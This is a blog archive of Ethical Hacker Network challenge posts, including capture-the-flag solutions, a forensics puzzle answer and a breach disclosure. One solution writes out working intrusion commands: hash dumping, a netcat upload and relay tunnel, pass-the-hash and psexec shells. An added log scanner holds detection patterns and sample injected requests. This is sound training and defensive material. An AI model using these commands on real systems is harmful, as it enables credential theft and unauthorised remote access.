ethical hacker – Grey Panthers Savannah (https://grey-panther.net)

New challenges (Fri, 18 Dec 2009 16:15:00 +0000, https://grey-panther.net/2009/12/new-challenges.html)

After missing the announcement for the second part of the Network Forensics Puzzle (yes, I’m subscribed to the feed now!) I would like to regain your trust by bringing two other contests to your attention:

Bonus content:

Have fun!

Picture taken from ChrisDag’s photostream with permission.

New Ethical Hacker challenge (Mon, 27 Jul 2009 15:30:00 +0000, https://grey-panther.net/2009/07/new-ethical-hacker-challenge.html)

From the guys at RaDaJo: Prison Break – Breaking, Entering and Decoding. It looks interesting (and more accessible than the wireless one, which was a little out of my league).

Have fun!

EthicalHacker.net compromised (Sat, 28 Feb 2009 17:51:00 +0000, https://grey-panther.net/2009/02/ethicalhacker-net-compromised.html)

Today I was greeted by the following e-mail in my inbox:

EH-Net Compromise Disclosure

EH-Net was compromised a few months back, and we are asking all members to immediately change their passwords. Although we do not hold any sensitive data such as social security numbers, credit card numbers, date of birth, etc., we still realize that, although it is not recommended, some members may use the same password for social sites such as ours as they do for more personally sensitive sites. If this is the case, please immediately change those passwords, too, and make both follow complexity guidelines.

We apologize for the late notification, but while we were in the process of cleaning the mess, we did not want the attackers to be notified. Our intention was to prevent multiple notifications and required actions by our members. Although we feel very comfortable in the status of the site and had planned on notifying all members, someone beat us to the punch. http://www.milw0rm.com/papers/297. We are providing this link, so that our members can see that a select few accounts and their passwords have been released to the public. We do not know how many more they have or will make public. This makes it even more urgent to change your passwords.

We apologize for any inconvenience this has caused. Although many other sites have experienced the same issues, and we are clearly a target based on the content of the site, this in no way excuses us for this incident.

Donald C. Donzal
Editor-in-Chief
The Ethical Hacker Network

Pretty sad. I enjoy their challenges. This goes to show that you always have to be vigilant, and assuming that your site is “unhackable” is a very dangerous attitude.

New Ethical Hacker Challenge (Mon, 09 Feb 2009 14:02:00 +0000, https://grey-panther.net/2009/02/new-ethical-hacker-challenge-2.html)

Brady Bunch Boondoggle – on first read I confused it with the Dukes of Hazzard, but I’ve since seen the error of my ways 🙂

Ethical hacker challenge solution posted (Fri, 23 Jan 2009 13:13:00 +0000, https://grey-panther.net/2009/01/ethical-hacker-challenge-solution-posted.html)

To the Santa Claus is Hacking in Town challenge. You can find it here: Santa Claus is Hacking to Town – Answers and Winners. Unfortunately my answer wasn’t accepted 100% because of a small misunderstanding, but it got cleared up and all is good now :-). The RaDaJo blog also posted a detailed solution (warning! PDF!). It is nice to find out that Metasploit already has this ability; you don’t need third-party tools. Hopefully search engines will pick up the text from the PDF, so that more textual information will be available about it.

Solution to the Ethical Hacker Challenge posted (Thu, 08 Jan 2009 16:16:00 +0000, https://grey-panther.net/2009/01/solution-to-the-ethical-hacker-challenge-posted.html)

Not to this one, but to an older one. This is the announcement and here is the winning solution. This one was actually one of the harder ones for me: I missed the hardware keylogger and didn’t figure out the Vigenère cipher.

Solution for the Ethical Hacker Network Challenge (Fri, 02 Jan 2009 20:20:00 +0000, https://grey-panther.net/2009/01/solution-for-the-ethical-hacker-network-challenge.html)

As always, I’m publishing my submission to the latest Ethical Hacker Network Challenge (after the submission deadline, of course). I believe that publishing all the solutions (rather than just the winner’s) creates a richer environment to learn from each other.

The basic idea came from tutorials I had seen on tunneling SMB over SSH; the difference is that here the tunnel had to go through two hosts, using netcat and some trickery. I have also written about particular steps in detail on the blog previously:

Without further ado, here is my submission:

1) What tool would you have the Winter Warlock download? Why?

The Pass-The-Hash (PSH) toolkit from http://oss.coresecurity.com/projects/pshtoolkit.htm, so that the password hash can be used directly for authentication rather than cracked (which would take a very long time, especially because the simpler LANMAN hashes are disabled due to the password length).

2) Devise a step-by-step approach for gaining control of the door1 server so that Kris can execute the dooropen.exe command with the privileges of the jailmaster account. Describe each tool you would use and how you would use it at each step of your hack.

The basic plan is the following:

  1. dump the password hashes from “jailmasterlaptop”
  2. use “web1” to create a tunnel for an SMB connection to “door1”
  3. use psexec + pshtoolkit to authenticate and run the executable

Now for the gory details:

– After compromising “jailmasterlaptop”, we should have a Meterpreter session. There, type:

use priv
hashdump

(the first command might not be necessary, but it doesn’t do any harm).
Note the hashes for the Jail Master account.

– get a netcat onto web1, if there isn’t one already (many *NIX systems come with it preinstalled). For example you could do something like this with the command execution vulnerability:

on the laptop:

encode the netcat with base64: base64 -w0 /bin/nc

execute the following commands on “web1”:

echo "The base64 encoded string"|base64 -d > /tmp/fb
chmod +x /tmp/fb

If we use the uploaded netcat, change all references in the following text from nc to /tmp/fb.

– now we are ready to create the tunnel. Since we have the restriction of only being able to create outgoing connections from “web1”, we do the following:

on the laptop (as root):

while true; do nc -l -p 80 -c "nc -l -p 139"; done

on “web1” (through the command execution vulnerability):

while true; do nc door1 139 -c "nc laptop 80"; done

The while loop is there to give us some leeway if we don’t manage to connect on the first try or get disconnected for some reason.

– Being connected, we now need the Pass-The-Hash toolkit downloaded in step 1. There is a slight problem here: on the laptop we might have a version of XP which isn’t supported by iam.exe, and iam-alt.exe has a little bug (http://hexale.blogspot.com/2008/10/bug-in-iam-alt-makes-it-fail-completely.html). We have two options: fix the bug in the source as the blog post describes and hope that we have a compiler to rebuild it, or patch the binary by searching for 00x (inverted because of the little-endianness of Intel CPUs) in it with a hex editor (mcedit will do) and replacing it with x00x00x00 (three times the zero byte) 🙂

The toolkit executables need to run from the SYSTEM account, so launch a shell with psexec that has SYSTEM account privileges:

psexec \\laptop -s c:\windows\system32\cmd.exe

Now inject the hash:

iam-alt.exe -h jailmaster:door1:thehashes:recoveredfromjailmasterlaptop

– Finally, use psexec to spawn a shell on door1 (proxied through the laptop and web1):

psexec \\laptop -u DOOR1\jailmaster c:\windows\system32\cmd.exe

Now that we (hopefully) have a shell on door1, search for the executable:

cd \
dir /s|find "dooropen"

3) Briefly finish this tale by describing how the Burgermeisters could detect the tactics you described in your answer to item 2, as well as how they could have defended against each step you described.

The weak link in the chain was the “web1” machine. They should have:

  • made sure that the web application doesn’t have known vulnerabilities 🙂
  • used something like mod_security to look for suspicious access patterns
  • used something like SELinux to disallow executables being run from /tmp
  • disallowed all outgoing connections from the server

Patching jailmasterlaptop would also have helped 😉

Finally, a login restriction could have been placed on the jailmaster account on “door1”, such that the account could not be used during non-working hours.
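The mod_security suggestion above can be made concrete as log inspection. The following is an added example (not part of the original submission): a small scanner that URL-decodes web-server access-log requests and flags the staging steps used against “web1” in the write-up. The log lines, the ping.php parameter, the host names and the IPs are all constructed, and the signatures are a hand-picked subset, not a real rule set.

```python
import re
from urllib.parse import unquote_plus

# Illustrative signatures for the staging steps from the write-up
# (assumption: a hand-picked subset, not any real mod_security rule set).
SIGNATURES = {
    "base64_stage": re.compile(r"base64\s+(?:-d|--decode)\b"),   # decode payload to disk
    "tmp_exec": re.compile(r"chmod\s+\+x\s+/tmp/"),               # make a /tmp file executable
    "nc_relay": re.compile(                                       # nc <host> <port> -c "..." relay
        r"(?:\bnc|\bnetcat|/tmp/\S+)\s+(?:-l\s+-p\s+\d+|\S+\s+\d+)\s+-c\s"),
    "while_loop": re.compile(r"while\s+true\s*;\s*do\b"),        # retry loop around the relay
}

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def analyse_line(line):
    """Return the decoded request plus the signature names it matched, or None if unparsable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    # URL-decode so that "chmod%20%2Bx" is inspected as "chmod +x"
    decoded = unquote_plus(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": m.group("ip"), "ts": m.group("ts"), "request": decoded, "hits": hits}

def find_suspicious(lines):
    """Keep only the requests that matched at least one signature."""
    results = (analyse_line(line) for line in lines)
    return [r for r in results if r and r["hits"]]

# Constructed access-log excerpt: normal traffic plus the three staging requests that a
# command-injection hole in a hypothetical ping.php could carry (hosts and IPs are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jan/2009:19:58:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 1523
10.0.0.9 - - [02/Jan/2009:20:01:13 +0000] "GET /ping.php?host=door1%3Becho%20QUJD%7Cbase64%20-d%20%3E%20/tmp/fb HTTP/1.1" 200 12
10.0.0.9 - - [02/Jan/2009:20:01:20 +0000] "GET /ping.php?host=door1%3Bchmod%20%2Bx%20/tmp/fb HTTP/1.1" 200 12
10.0.0.9 - - [02/Jan/2009:20:02:44 +0000] "GET /ping.php?host=door1%3Bwhile%20true%3B%20do%20/tmp/fb%20door1%20139%20-c%20%22/tmp/fb%20laptop%2080%22%3B%20done HTTP/1.1" 200 12
10.0.0.5 - - [02/Jan/2009:20:05:00 +0000] "GET /about.html HTTP/1.1" 200 880
"""

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG.splitlines()):
        print(finding["ts"], finding["ip"], finding["hits"], finding["request"])
```

Real rule sets should also look at POST bodies and at the egress side (a web server opening connections to port 139 on an internal host), which the access log alone does not show.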

New ethical hacker challenge (Sun, 07 Dec 2008 07:38:00 +0000, https://grey-panther.net/2008/12/new-ethical-hacker-challenge-3.html)

Santa Claus is Hacking in Town. Enjoy.

Ethical hacker challenge solution (Tue, 18 Nov 2008 05:43:00 +0000, https://grey-panther.net/2008/11/ethical-hacker-challenge-solution.html)

Given that the deadline has passed, I’ll publish my solution to the Scooby Doo Ethical Hacker challenge. In related news (via SANS): the November challenge from packetlife. The deadline is the 20th of November, so hurry up.

Can you figure out who killed Dr. Wilson, and why? I would say it was Dr. Miller. In the partial disk image there was an e-mail saying:

“I know how you’ve been obtaining our passwords to steal the exams
provide them to the students. You’ll see I have the proof in the
attachment. I expect you to resign your position and leave the
University at the end of the semester or I will be forced to
disclose this information and fire you.
Dr. Wilson”

The attachment contained a photo of Dr. Miller’s office. In the photo one can see a box of what I assume is a wireless camera. As the answer to question 2 explains, this was used to steal the exams, and Dr. Miller feared for his reputation / position.

How were the passwords stolen to steal the exams? My theory is that, using a wireless camera, the passwords were either read directly from the monitor or captured as they were typed in.

Can you provide a copy of the cryptography final exam? Can you create an answer key? Foremost extracts it from the partial drive image (together with the Rick Astley video ;-)). On a side note, the e-mail was not extracted by foremost (probably because the headers were badly damaged; in this case they were entirely gone), so it had to be extracted manually and the attachment decoded (for example by using the online Base64 decoder at http://www.motobit.com/util/base64-decoder-encoder.asp).

The answers are:

The first question (a “shift” cipher with a shift of 16 places):

a long time ago, in a galaxy far, far away it is a period of civil war. rebel spaceships, striking from a hidden base, have won their first victory against the evil galactic empire. during the battle, rebel spies managed to steal secret plans to the empire’s ultimate weapon, the death star, an armored space station with enough power to destroy an entire planet. pursued by the empire’s sinister agents, princess leia races home aboard her starship, custodian of the stolen plans that can save her people and restore freedom to the galaxy

The second one I didn’t manage to figure out.

The third one was encrypted with the Enigma cipher. Given the specified settings, one can use one of the many available simulators (for example the one at http://enigmaco.de/enigma/enigma.html) and get the decoded result: SOMEBODY SETUP US THE BOMB.
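For the first exam question, here is an added example (not code from the original post or from the challenge) of recovering the shift without being told it: the ciphertext is constructed by applying the same 16-place shift to the recovered opening sentence, and the solver scores all 26 candidate shifts by chi-squared distance from English letter frequencies. The approach generalizes to any shift, not just 16.

```python
import string

# Approximate English letter frequencies in percent, a..z (commonly cited table).
ENGLISH_FREQ = [8.17, 1.49, 2.78, 4.25, 12.70, 2.23, 2.02, 6.09, 6.97, 0.15, 0.77, 4.03, 2.41,
                6.75, 7.51, 1.93, 0.10, 5.99, 6.33, 9.06, 2.76, 0.98, 2.36, 0.15, 1.97, 0.07]

def shift(text, k):
    """Shift every letter k places along the alphabet (wrapping); other characters are kept."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + k) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

def chi_squared(text):
    """How far the letter distribution of text is from English; lower is more English-like."""
    letters = [c for c in text.lower() if c in string.ascii_lowercase]
    n = len(letters)
    if n == 0:
        return float("inf")
    score = 0.0
    for i, c in enumerate(string.ascii_lowercase):
        expected = ENGLISH_FREQ[i] * n / 100
        score += (letters.count(c) - expected) ** 2 / expected
    return score

def crack_shift(ciphertext):
    """Try all 26 shifts and return (shift used for encryption, recovered plaintext)."""
    best = min(range(26), key=lambda k: chi_squared(shift(ciphertext, -k)))
    return best, shift(ciphertext, -best)

# Constructed test input: the opening of the recovered plaintext, shifted 16 places as in
# the exam question (the shift is only used here to build the sample, never by the solver).
PLAINTEXT = "a long time ago, in a galaxy far, far away it is a period of civil war."
CIPHERTEXT = shift(PLAINTEXT, 16)

if __name__ == "__main__":
    k, recovered = crack_shift(CIPHERTEXT)
    print(CIPHERTEXT)
    print("shift:", k)
    print(recovered)
```

Frequency scoring needs a few dozen letters to be reliable; for very short ciphertexts, print all 26 candidates and read off the one that makes sense.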

Also, provide some analysis of Velma’s incident handling process. What did she do right? What should she have done differently?

The most important problem is that, because she did not use a write blocker, it will be hard to prove that the contents of the drive were not changed. Her actions might also have destroyed physical evidence (fingerprints, for example). What she did right was imaging the drive and working on the image, rather than working on the drive itself.

Ethical hacker challenges (Mon, 27 Oct 2008 16:08:00 +0000, https://grey-panther.net/2008/10/ethical-hacker-challenges.html)

A new challenge is in full swing: Scooby Doo and the Crypto Caper. The solutions for the previous one will be announced shortly. That should be very interesting, since it involved some hardcore Linux hacking.
